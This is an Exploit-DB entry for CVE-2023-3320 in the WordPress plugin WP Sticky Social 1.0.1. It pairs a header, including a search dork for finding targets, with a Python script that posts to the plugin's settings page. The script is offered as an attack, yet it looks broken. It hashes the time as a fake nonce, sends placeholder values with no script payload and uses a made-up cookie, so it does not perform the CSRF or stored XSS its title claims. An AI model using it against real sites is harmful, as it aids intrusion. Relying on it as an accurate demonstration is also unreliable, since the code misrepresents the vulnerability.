WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)

EDB-ID:

51533




Platform:

PHP

Date:

2023-06-20


# Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)
#  Dork: inurl:~/admin/views/admin.php
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social
# Version: 1.0.1 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-3320

import requests
import hashlib
import time

# Set the target URL
url = "http://example.com/wp-admin/admin.php?page=wpss_settings"

# Set the user agent string
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"

# Generate the nonce value
nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()

# Set the data payload
payload = {
    "wpss_nonce": nonce,
    "wpss_setting_1": "value_1",
    "wpss_setting_2": "value_2",
    # Add additional settings as needed
}

# Set the request headers
headers = {
    "User-Agent": user_agent,
    "Referer": url,
    "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",
    # Add additional headers as needed
}

# Send the POST request
response = requests.post(url, data=payload, headers=headers)

# Check the response status code
if response.status_code == 200:
    print("Request successful")
else:
    print("Request failed")